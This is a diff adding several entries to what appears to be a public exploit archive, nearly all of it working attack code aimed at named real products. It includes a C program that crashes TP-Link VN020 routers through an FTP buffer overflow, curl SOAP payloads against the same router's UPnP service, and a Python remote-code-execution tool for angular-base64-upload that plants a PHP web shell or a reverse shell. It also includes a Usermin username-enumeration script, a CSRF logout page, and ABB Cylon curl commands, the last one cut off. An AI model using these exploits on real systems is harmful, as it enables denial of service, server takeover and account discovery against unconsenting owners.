diff --git a/exploits/multiple/remote/52249.c b/exploits/multiple/remote/52249.c
new file mode 100644
index 000000000..a916892ee
--- /dev/null
+++ b/exploits/multiple/remote/52249.c
@@ -0,0 +1,248 @@
+* Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption
+* Date: 11/24/2024
+* Exploit Author: Mohamed Maatallah
+* Vendor Homepage: https://www.tp-link.com
+* Version: TT_V6.2.1021 (VN020-F3v(T))
+* Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
+* CVE: CVE-2024-12344
+* Category: Remote
+
+* Description:
+* A critical buffer overflow and memory corruption vulnerability was discovered in TP-Link VN020-F3v(T) router's FTP server implementation. The vulnerability stems from improper input validation of the USER command, allowing unauthenticated attackers to trigger various failure modes through payload size manipulation:
+
+* 1. 1100 bytes - Delayed crash (5-10 seconds)
+* 2. 1450 bytes - Immediate crash
+* 3. >1450 bytes - Undefined behavior/state corruption
+
+* Proof of Concept: (attached full c file)
+ * Compilation Instructions (Visual Studio):
+ * ---------------------------------------
+ * 1. Open Visual Studio
+ * 2. Create a new C Console Application
+ * 3. Add these additional dependencies to project settings:
+ *    - ws2_32.lib
+ *    - iphlpapi.lib
+ * 4. Ensure Windows SDK is installed
+ * 5. Set Platform Toolset to latest v143 or v142
+ * 6. Compile in Release or Debug mode
+ *
+ * Disclaimer:
+ * ----------
+ * This proof of concept is for educational and research purposes only.
+ * Unauthorized testing without explicit permission is unethical and illegal.
+ */
+
+#define _CRT_SECURE_NO_WARNINGS
+#include <stdio.h>
+#include <stdlib.h>
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <stdint.h>
+#include <windows.h>
+#include <iphlpapi.h>
+#include <icmpapi.h>
+
+#pragma comment(lib, "ws2_32.lib")
+#pragma comment(lib, "iphlpapi.lib")
+
+ // Target configuration - MODIFY BEFORE TESTING
+#define DEST_IP "192.168.1.1"     // IP of target FTP server
+#define DEST_PORT 21               // Standard FTP port
+#define PING_TIMEOUT_MS 1000       // Network timeout
+#define MAX_PING_RETRIES 5         // Connectivity check attempts
+
+// 1450: Instant
+// 1100: Delayed
+#define CRASH_STRING_LENGTH 1450   // Exact number of 'A's triggering instantcrash
+#define TOTAL_PAYLOAD_LENGTH (CRASH_STRING_LENGTH + 5 + 2)  // USER + As + \r\n
+
+typedef struct {
+    HANDLE icmp_handle;
+    IPAddr target_addr;
+    LPVOID reply_buffer;
+    DWORD reply_size;
+} ping_context_t;
+
+void log_msg(const char* prefix, const char* msg) {
+    SYSTEMTIME st;
+    GetLocalTime(&st);
+    printf("[%02d:%02d:%02d] %s %s\n", st.wHour, st.wMinute, st.wSecond, prefix, msg);
+}
+
+void hexdump(const char* desc, const void* addr, const int len) {
+    int i;
+    unsigned char buff[17];
+    const unsigned char* pc = (const unsigned char*)addr;
+
+    if (desc != NULL)
+        printf("%s:\n", desc);
+
+    for (i = 0; i < len; i++) {
+        if ((i % 16) == 0) {
+            if (i != 0)
+                printf("  %s\n", buff);
+            printf("  %04x ", i);
+        }
+
+        printf(" %02x", pc[i]);
+
+        if ((pc[i] < 0x20) || (pc[i] > 0x7e))
+            buff[i % 16] = '.';
+        else
+            buff[i % 16] = pc[i];
+        buff[(i % 16) + 1] = '\0';
+    }
+
+    while ((i % 16) != 0) {
+        printf("   ");
+        i++;
+    }
+
+    printf("  %s\n", buff);
+}
+
+BOOL check_connectivity(ping_context_t* ctx) {
+    char send_buf[32] = { 0 };
+    return IcmpSendEcho(ctx->icmp_handle, ctx->target_addr, send_buf, sizeof(send_buf),
+        NULL, ctx->reply_buffer, ctx->reply_size, PING_TIMEOUT_MS) > 0;
+}
+
+char* generate_exact_crash_payload() {
+    char* payload = (char*)malloc(TOTAL_PAYLOAD_LENGTH + 1);  // +1 for null terminator
+    if (!payload) {
+        log_msg("[-]", "Failed to allocate payload memory");
+        return NULL;
+    }
+
+    // Construct the exact payload that causes crash
+    strcpy(payload, "USER ");                            // 5 bytes
+    memset(payload + 5, 'A', CRASH_STRING_LENGTH);      // 1450 'A's
+    memcpy(payload + 5 + CRASH_STRING_LENGTH, "\r\n", 2); // 2 bytes
+    payload[TOTAL_PAYLOAD_LENGTH] = '\0';
+
+    char debug_msg[100];
+    snprintf(debug_msg, sizeof(debug_msg), "Generated payload of length %d ('A's + 5 byte prefix + 2 byte suffix)",
+        TOTAL_PAYLOAD_LENGTH);
+    log_msg("[*]", debug_msg);
+
+    return payload;
+}
+
+BOOL send_crash_payload(const char* target_ip, uint16_t target_port) {
+    WSADATA wsa;
+    SOCKET sock = INVALID_SOCKET;
+    struct sockaddr_in server;
+    char server_reply[2048];
+    int recv_size;
+    ping_context_t ping_ctx = { 0 };
+    BOOL success = FALSE;
+
+    // Initialize Winsock
+    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
+        log_msg("[-]", "Winsock initialization failed");
+        return FALSE;
+    }
+
+    // Setup ICMP for connectivity monitoring
+    ping_ctx.icmp_handle = IcmpCreateFile();
+    ping_ctx.reply_size = sizeof(ICMP_ECHO_REPLY) + 32;
+    ping_ctx.reply_buffer = malloc(ping_ctx.reply_size);
+    inet_pton(AF_INET, target_ip, &ping_ctx.target_addr);
+
+    // Create socket
+    sock = socket(AF_INET, SOCK_STREAM, 0);
+    if (sock == INVALID_SOCKET) {
+        log_msg("[-]", "Socket creation failed");
+        goto cleanup;
+    }
+
+    // Setup server address
+    server.sin_family = AF_INET;
+    server.sin_port = htons(target_port);
+    inet_pton(AF_INET, target_ip, &server.sin_addr);
+
+    // Connect to FTP server
+    log_msg("[*]", "Connecting to target FTP server...");
+    if (connect(sock, (struct sockaddr*)&server, sizeof(server)) < 0) {
+        log_msg("[-]", "Connection failed");
+        goto cleanup;
+    }
+    log_msg("[+]", "Connected successfully");
+
+    // Verify initial connectivity
+    if (!check_connectivity(&ping_ctx)) {
+        log_msg("[-]", "No initial connectivity to target");
+        goto cleanup;
+    }
+
+    // Receive banner
+    if ((recv_size = recv(sock, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR) {
+        log_msg("[-]", "Failed to receive banner");
+        goto cleanup;
+    }
+    server_reply[recv_size] = '\0';
+    log_msg("[*]", server_reply);
+
+    // Generate and send the exact crash payload
+    char* payload = generate_exact_crash_payload();
+    if (!payload) {
+        goto cleanup;
+    }
+
+    log_msg("[*]", "Sending crash payload...");
+    hexdump("Payload hex dump (first 32 bytes)", payload, 32);
+
+    if (send(sock, payload, TOTAL_PAYLOAD_LENGTH, 0) < 0) {
+        log_msg("[-]", "Failed to send payload");
+        free(payload);
+        goto cleanup;
+    }
+    free(payload);
+    log_msg("[+]", "Payload sent successfully");
+
+    // Monitor for crash
+    log_msg("[*]", "Monitoring target status...");
+    Sleep(1000);  // Wait a bit for crash to take effect
+
+    int failed_pings = 0;
+    for (int i = 0; i < MAX_PING_RETRIES; i++) {
+        if (!check_connectivity(&ping_ctx)) {
+            failed_pings++;
+            if (failed_pings >= 3) {
+                log_msg("[+]", "Target crash confirmed!");
+                success = TRUE;
+                goto cleanup;
+            }
+        }
+        Sleep(500);
+    }
+
+    log_msg("[-]", "Target appears to still be responsive");
+
+cleanup:
+    if (sock != INVALID_SOCKET) {
+        closesocket(sock);
+    }
+    if (ping_ctx.icmp_handle != INVALID_HANDLE_VALUE) {
+        IcmpCloseHandle(ping_ctx.icmp_handle);
+    }
+    if (ping_ctx.reply_buffer) {
+        free(ping_ctx.reply_buffer);
+    }
+    WSACleanup();
+    return success;
+}
+
+int main(void) {
+    printf("\nTP-Link VN020 FTP Memory Corruption PoC\n");
+    printf("---------------------------------------\n");
+    printf("Target: %s:%d\n", DEST_IP, DEST_PORT);
+    if (send_crash_payload(DEST_IP, DEST_PORT)) {
+        printf("\nExploit successful - target crashed\n");
+    }
+    else {
+        printf("\nExploit failed - target may be patched\n");
+    }
+
+    return 0;
+}
\ No newline at end of file
diff --git a/exploits/multiple/remote/52250.txt b/exploits/multiple/remote/52250.txt
new file mode 100644
index 000000000..38119d761
--- /dev/null
+++ b/exploits/multiple/remote/52250.txt
@@ -0,0 +1,43 @@
+# Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)
+# Date: 10/22/2024
+# Exploit Author: Mohamed Maatallah
+# Vendor Homepage: https://www.tp-link.com
+# Version: TT_V6.2.1021 (VN020-F3v(T))
+# Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
+# CVE: CVE-2024-12342
+
+
+Description:
+Two critical vulnerabilities discovered in TP-Link VN020-F3v(T) router's
+UPnP implementation, affecting the WANIPConnection service. The
+vulnerabilities allow unauthenticated attackers to cause denial of service
+and potential memory corruption through malformed SOAP requests.
+
+Proof of Concept 1 (Missing Parameters DoS):
+
+curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
+-H "Content-Type: text/xml" \
+-H "SOAPAction:
+\"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"" \
+-d '<?xml version="1.0"?>
+<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
+<s:Body><u:AddPortMapping>
+<NewPortMappingDescription>hello</NewPortMappingDescription>
+</u:AddPortMapping></s:Body></s:Envelope>'
+
+Proof of Concept 2 (Memory Corruption):
+
+curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
+     -H "Content-Type: text/xml" \
+     -H "SOAPAction:
+\"urn:schemas-upnp-org:service:WANIPConnection:1#SetConnectionType\"" \
+     -d '<?xml version="1.0"?>
+<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
+  <s:Body>
+    <u:SetConnectionType
+xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
+      <NewConnectionType>'"$(perl -e 'print "%x" x
+10000;')"'</NewConnectionType>
+    </u:SetConnectionType>
+  </s:Body>
+</s:Envelope>'
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52253.py b/exploits/multiple/webapps/52253.py
new file mode 100755
index 000000000..ccb0f17ca
--- /dev/null
+++ b/exploits/multiple/webapps/52253.py
@@ -0,0 +1,180 @@
+# Exploit Title: Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE)
+# Date: 10 October 2024
+# Discovered by : Ravindu Wickramasinghe | rvz (@rvizx9)
+# Exploit Author: Ravindu Wickramasinghe | rvz (@rvizx9)
+# Vendor Homepage: https://www.npmjs.com/package/angular-base64-upload
+# Software Link: https://github.com/adonespitogo/angular-base64-upload
+# Version: prior to v0.1.21
+# Tested on: Arch Linux
+# CVE : CVE-2024-42640
+# Severity: Critical - 10.0 (CVSS 4.0)
+# Github Link : https://github.com/rvizx/CVE-2024-42640
+# Blog Post : https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html
+
+import re
+import subprocess
+import requests
+import sys
+import os
+import uuid
+import base64
+import cmd
+from urllib.parse import urlparse
+
+
+def banner():
+    print('''
+
+                \033[2mCVE-2024-42640\033[0m - Unauthenticated RCE via Anuglar-Base64-Upload Library \033[2m PoC Exploit
+                \033[0mRavindu Wickramasinghe\033[2m | rvz (ラヴィズ) - twitter: @rvizx9
+                https://github.com/rvizx/\033[0mCVE-2024-42640
+
+''')
+
+
+def check_version(target):
+    response = requests.get(target)
+    first_line = response.text.splitlines()[0].strip()
+    match = re.search(r'v0\.(1|0)\.(\d+)', first_line)
+
+    if match:
+        version = match.group(0)
+        x_value = int(match.group(1))
+        if x_value <= 20:
+            print(f"\033[94m[inf]:\033[0m target is using a vulnerable version. [version]: {version}")
+        else:
+            print(f"\033[91m[err]:\033[0m target is not vulnerable [version]: {version}")
+            exit()
+    else:
+        print("\033[91m[err]:\033[0m couldn't find the version")
+
+
+def enum(url):
+    print("\033[94m[inf]:\033[0m enumerating... ")
+    target = f"{url}/bower_components/angular-base64-upload/dist/angular-base64-upload.min.js"
+    r = requests.head(target)
+    if r.status_code == 200:
+        print("\033[94m[inf]:\033[0m target is using bower_components")
+        check_version(target)
+    else:
+        print("\033[94m[inf]:\033[0m target is not using bower_components")
+        target = f"{url}/node_modules/angular-base64-upload/dist/angular-base64-upload.min.js"
+        r = requests.head(target)
+        if r.status_code == 200:
+            print("\033[94m[inf]:\033[0m target is using node_modules")
+            check_version(target)
+        else:
+            print("\033[94m[inf]:\033[0m target is not using node_modules")
+            print("\033[91m[err]:\033[0m an error occured, it was not possible to enumerate for dist/angular-base64-upload.min.js")
+            print("\033[93m[ins]:\033[0m please make sure you've defined the target to the endpoint prior to the depdency installation directory")
+            print("\033[93m[ins]:\033[0m for manual exploitation, please refer to this: https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html")
+            print("\033[91m[err]:\033[0m exiting..")
+            exit()
+    exploit(target)
+
+
+class CmdShell(cmd.Cmd):
+    username = subprocess.check_output("whoami", shell=True).strip().decode()
+    domain = urlparse(sys.argv[1]).netloc
+    prompt = f"{username}@{domain} > "
+
+    def __init__(self, payload_url):
+        super().__init__()
+        self.payload_url = payload_url
+
+    def default(self, line):
+        url = f"{self.payload_url}?cmd={line}"
+        try:
+            response = requests.get(url)
+            print(response.text)
+        except requests.RequestException as e:
+             print("\033[91m[err]:\033[0m {e}")
+
+    def do_exit(self, arg):
+        return True
+
+def exploit(target):
+    print(f"[dbg]: {target}")
+    target_server_url = target.replace("dist/angular-base64-upload.min.js","demo/server.php")
+    print(f"[dbg]: {target_server_url}")
+    payload_name = str(uuid.uuid4())+".php"
+    if  len(sys.argv) > 2:
+        if sys.argv[2] == "--rev":
+            revshell = "https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php"
+            print("\033[94m[inf]:\033[0m generating a php reverse shell to upload..")
+            ip = input("\033[93m[ins]:\033[0m enter listener ip / domain: ")
+            port = input("\033[93m[ins]:\033[0m enter listenter port: ")
+            print(f"\033[93m[ins]:\033[0m start a listener, execute nc -lvnp {port}")
+            input("\033[93m[ins]:\033[0m press enter to continue...")
+            print("\033[94m[inf]:\033[0m downloading php-reverse-shell from github/pentestmonkey...")
+            response = requests.get(revshell)
+            if response.status_code == 200:
+                payload = response.text.replace("127.0.0.1", ip).replace("1234", port) # replacing default values with user input
+                with open(payload_name, "w") as file:
+                    file.write(payload)
+                payload_url = upload_to_server(payload_name,target_server_url)
+                print("\033[94m[inf]:\033[0m executing the uploaded reverse-shell..")
+                r = requests.get(payload_url)
+                if r.status_code == 200:
+                    print("\033[94m[inf]:\033[0m process complete!")
+                else:
+                    print("\033[91m[err]:\033[0m something went wrong!")
+                print("\033[93m[ins]:\033[0m please check the listener for incoming connections.")
+            else:
+                print("\033[91m[err]:\033[0m failed to fetch the php-reverse-shell.")
+                print("\033[91m[err]:\033[0m exiting..")
+                exit()
+
+    else:
+        payload = "<?php if($_GET['cmd']) {system($_GET['cmd']);} ?>"
+        with open(payload_name, "w") as file:
+            file.write(payload)
+        payload_url = upload_to_server(payload_name,target_server_url)
+        cmd_shell = CmdShell(payload_url)
+        cmd_shell.cmdloop()
+
+def upload_to_server(payload_name,target_server_url):
+    try:
+        with open(payload_name, 'rb') as file:
+            file_content = file.read()
+            base64_payload = base64.b64encode(file_content).decode('utf-8')
+
+            headers = {
+                'Content-Type': 'application/json',
+                }
+
+            json_data = {
+                'base64': base64_payload,
+                'filename': payload_name,
+                }
+
+            response = requests.post(target_server_url, headers=headers, json=json_data, verify=False)
+            print("\033[94m[inf]:\033[0m file upload request sent! [status-code]: ",response.status_code)
+            updemo_endpoint = f"uploads/{payload_name}"
+            print(f"[dbg]: {updemo_endpoint}")
+            payload_url = target_server_url.replace("server.php",updemo_endpoint)
+            print(f"[dbg]: {payload_url}")
+            if response.status_code == 200:
+                print(f"\033[94m[inf]:\033[0m payload is uploaded to {payload_url}")
+                return payload_url
+            else:
+                print("\033[91m[err]:\033[0m something went wrong! failed to upload the payload to server")
+                exit()
+    except Exception as e:
+        print(f"\033[91m[err]:\033[0m {e}")
+        exit()
+
+if __name__ == "__main__":
+    try:
+        banner()
+        if  len(sys.argv) > 1:
+            url = sys.argv[1]
+            print(f"\033[94m[inf]:\033[0m target: {url}")
+            enum(url)
+        else:
+            print("[usg]: ./exploit.py <target-url>")
+            print("[usg]: ./exploit.py <target-url> --rev")
+            exit()
+    except Exception as e:
+        print(f"\033[91m[err]:\033[0m {e}")
+        exit()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52254.py b/exploits/multiple/webapps/52254.py
new file mode 100755
index 000000000..f03e5b3a5
--- /dev/null
+++ b/exploits/multiple/webapps/52254.py
@@ -0,0 +1,54 @@
+# Exploit Title: Usermin 2.100 - Username Enumeration
+# Date: 10.02.2024
+# Exploit Author: Kjesper
+# Vendor Homepage: https://www.webmin.com/usermin.html
+# Software Link: https://github.com/webmin/usermin
+# Version: <= 2.100
+# Tested on: Kali Linux
+# CVE: CVE-2024-44762
+# https://senscybersecurity.nl/cve-2024-44762-explained/
+
+#!/usr/bin/python3
+# -*- coding: utf-8 -*-
+# Usermin - Username Enumeration (Version 2.100)
+# Usage: UserEnumUsermin.py -u HOST -w WORDLIST_USERS
+# Example: UserEnumUsermin.py -u https://127.0.0.1:20000 -w users.txt
+
+import requests
+import json
+import requests
+import argparse
+import sys
+from urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+parser = argparse.ArgumentParser()
+
+parser.add_argument("-u", "--url", help = "use -u with the url to the host of usermin, EX: \"-u https://127.0.0.1:20000\"")
+parser.add_argument("-w", "--wordlist_users", help = "use -w with the username wordlist, EX: \"-w users.txt\"")
+
+args = parser.parse_args()
+
+if len(sys.argv) != 5:
+    print("Please provide the -u for URL and -w for the wordlist containing the usernames")
+    print("EX: python3 UsernameEnum.py -u https://127.0.0.1:20000 -w users.txt")
+    exit()
+
+usernameFile = open(args.wordlist_users, 'r')
+
+dataUsername = usernameFile.read()
+usernameFileIntoList = dataUsername.split("\n")
+usernameFile.close()
+
+for i in usernameFileIntoList:
+
+    newHeaders = {'Content-type': 'application/x-www-form-urlencoded', 'Referer': '%s/password_change.cgi' % args.url}
+    params = {'user':i, 'pam':'', 'expired':'2', 'old':'fakePassword', 'new1':'password', 'new2':'password'}
+    response = requests.post('%s/password_change.cgi' % args.url, data=params, verify=False, headers=newHeaders)
+        if "Failed to change password: The current password is incorrect." in response.text:
+        print("Possible user found with username: " + i)
+
+    if "Failed to change password: Your login name was not found in the password file!" not in response.text and "Failed to change password: The current password is incorrect." not in response.text:
+        print("Application is most likely not vulnerable and are therefore quitting.")
+        exit() # comment out line 33-35 if you would still like to try username enumeration.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52256.txt b/exploits/multiple/webapps/52256.txt
new file mode 100644
index 000000000..344daac4a
--- /dev/null
+++ b/exploits/multiple/webapps/52256.txt
@@ -0,0 +1,43 @@
+#Exploit Title: Blood Bank & Donor Management System 2.4 - CSRF Improper
+Input Validation
+# Google Dork: N/A
+# Date: 2024-12-26
+# Exploit Author: Kwangyun Keum
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/blood-bank-donor-management-system/
+# Version: 2.4
+# Tested on: Windows 10 / Kali Linux with Apache and MySQL
+# CVE: CVE-2024-12955
+
+## Description:
+Blood Bank & Donor Management System v2.4 suffers from a Cross-Site Request
+Forgery (CSRF) vulnerability due to the absence of CSRF tokens for critical
+functionalities such as logout. An attacker can craft a malicious iframe
+embedding the logout URL and trick a victim into clicking it. This results
+in the victim being logged out without their consent.
+
+## Steps to Reproduce:
+1. Deploy Blood Bank & Donor Management System v2.4.
+2. Log in as any user.
+3. Use the following PoC to demonstrate the issue:
+
+   ```html
+   <html>
+     <body>
+       <iframe
+         src="http://localhost/bbdms/logout.php"
+         style="border:0px #FFFFFF none;"
+         name="myLogoutFrame"
+         scrolling="no"
+         frameborder="1"
+         marginheight="0px"
+         marginwidth="0px"
+         height="400px"
+         width="600px"
+         allowfullscreen>
+       </iframe>
+     </body>
+   </html>
+4. Save the above HTML code as logout_poc.html.
+5.Open the file in a browser and click anywhere on the page to trigger the
+logout.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52257.txt b/exploits/multiple/webapps/52257.txt
new file mode 100644
index 000000000..b483631e2
--- /dev/null
+++ b/exploits/multiple/webapps/52257.txt
@@ -0,0 +1,26 @@
+# Exploit Title: compop.ca 3.5.3 - Arbitrary code Execution
+# Google Dork: Terms of Use inurl:compop.vip
+# Date: 22/12/2024
+# Exploit Author: dmlino
+# Vendor Homepage: https://www.compop.ca/
+# Version: 3.5.3
+# CVE : CVE-2024-48445
+
+
+The restaurant management system implements authentication using a Unix
+timestamp parameter ("ts") in the URL. This implementation is vulnerable to
+manipulation as it relies solely on time-based validation without proper
+authentication mechanisms.
+
+Technical Details:
+The application uses a URL parameter "ts" which accepts a Unix timestamp
+value.
+
+Steps:
+1. Find a vulnerable restaurant.
+
+2. Get the current time in the UNIX format:
+    Linux: $date +%s
+    Windows Powershell: [int](Get-Date -UFormat %s -Millisecond 0)
+
+3. Replace parameter in url with the new value
\ No newline at end of file
diff --git a/exploits/php/hardware/52251.txt b/exploits/php/hardware/52251.txt
new file mode 100644
index 000000000..953978b87
--- /dev/null
+++ b/exploits/php/hardware/52251.txt
@@ -0,0 +1,79 @@
+# Exploit Title: ABB Cylon Aspect 3.08.02 (deployStart.php) Unauthenticated Command Execution
+# Vendor: ABB Ltd.
+# Product web page: https://www.global.abb
+# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
+                  Firmware: <=3.08.02
+
+Summary: ASPECT is an award-winning scalable building energy management
+and control solution designed to allow users seamless access to their
+building data through standard building protocols including smart devices.
+
+Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
+shell command execution vulnerability through the deployStart.php script.
+This allows any user to trigger the execution of 'rundeploy.sh' script, which
+initializes the Java deployment server that sets various configurations,
+potentially causing unauthorized server initialization and performance issues.
+
+Tested on: GNU/Linux 3.15.10 (armv7l)
+           GNU/Linux 3.10.0 (x86_64)
+           GNU/Linux 2.6.32 (x86_64)
+           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
+           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
+           PHP/7.3.11
+           PHP/5.6.30
+           PHP/5.4.16
+           PHP/4.4.8
+           PHP/5.3.3
+           AspectFT Automation Application Server
+           lighttpd/1.4.32
+           lighttpd/1.4.18
+           Apache/2.2.15 (CentOS)
+           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
+           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
+           ErgoTech MIX Deployment Server 2.0.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2024-5891
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5891.php
+CVE ID: CVE-2024-48840
+CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48840
+
+
+21.04.2024
+
+--
+
+
+$ cat project
+
+                 P   R   O   J   E   C   T
+
+                        .|
+                        | |
+                        |'|            ._____
+                ___    |  |            |.   |' .---"|
+        _    .-'   '-. |  |     .--'|  ||   | _|    |
+     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
+     |' | |.    |    ||       | |   |  |    ||      |
+ ____|  '-'     '    ""       '-'   '-.'    '`      |____
+░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
+         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
+
+
+$ curl http://192.168.73.31/deployStart.php
\ No newline at end of file
diff --git a/exploits/php/hardware/52252.txt b/exploits/php/hardware/52252.txt
new file mode 100644
index 000000000..0eb3f0517
--- /dev/null
+++ b/exploits/php/hardware/52252.txt
@@ -0,0 +1,135 @@
+# Exploit Title: ABB Cylon Aspect 3.08.02 (ethernetUpdate.php) - Authenticated Path Traversal
+# Vendor: ABB Ltd.
+# Product web page: https://www.global.abb
+# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
+                  Firmware: <=3.08.02
+
+Summary: ASPECT is an award-winning scalable building energy management
+and control solution designed to allow users seamless access to their
+building data through standard building protocols including smart devices.
+
+Desc: The ABB Cylon controller suffers from an authenticated path traversal
+vulnerability. This can be exploited through the 'devName' POST parameter in
+the ethernetUpdate.php script to write partially controlled content, such as
+IP address values, into arbitrary file paths, potentially leading to configuration
+tampering and system compromise including denial of service scenario through
+ethernet configuration backup file overwrite.
+
+Tested on: GNU/Linux 3.15.10 (armv7l)
+           GNU/Linux 3.10.0 (x86_64)
+           GNU/Linux 2.6.32 (x86_64)
+           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
+           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
+           PHP/7.3.11
+           PHP/5.6.30
+           PHP/5.4.16
+           PHP/4.4.8
+           PHP/5.3.3
+           AspectFT Automation Application Server
+           lighttpd/1.4.32
+           lighttpd/1.4.18
+           Apache/2.2.15 (CentOS)
+           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
+           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
+           ErgoTech MIX Deployment Server 2.0.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2024-5890
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5890.php
+
+
+21.04.2024
+
+--
+
+
+$ cat project
+
+                 P   R   O   J   E   C   T
+
+                        .|
+                        | |
+                        |'|            ._____
+                ___    |  |            |.   |' .---"|
+        _    .-'   '-. |  |     .--'|  ||   | _|    |
+     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
+     |' | |.    |    ||       | |   |  |    ||      |
+ ____|  '-'     '    ""       '-'   '-.'    '`      |____
+░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
+         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
+
+
+$ curl http://192.168.73.31/ethernetUpdate.php \
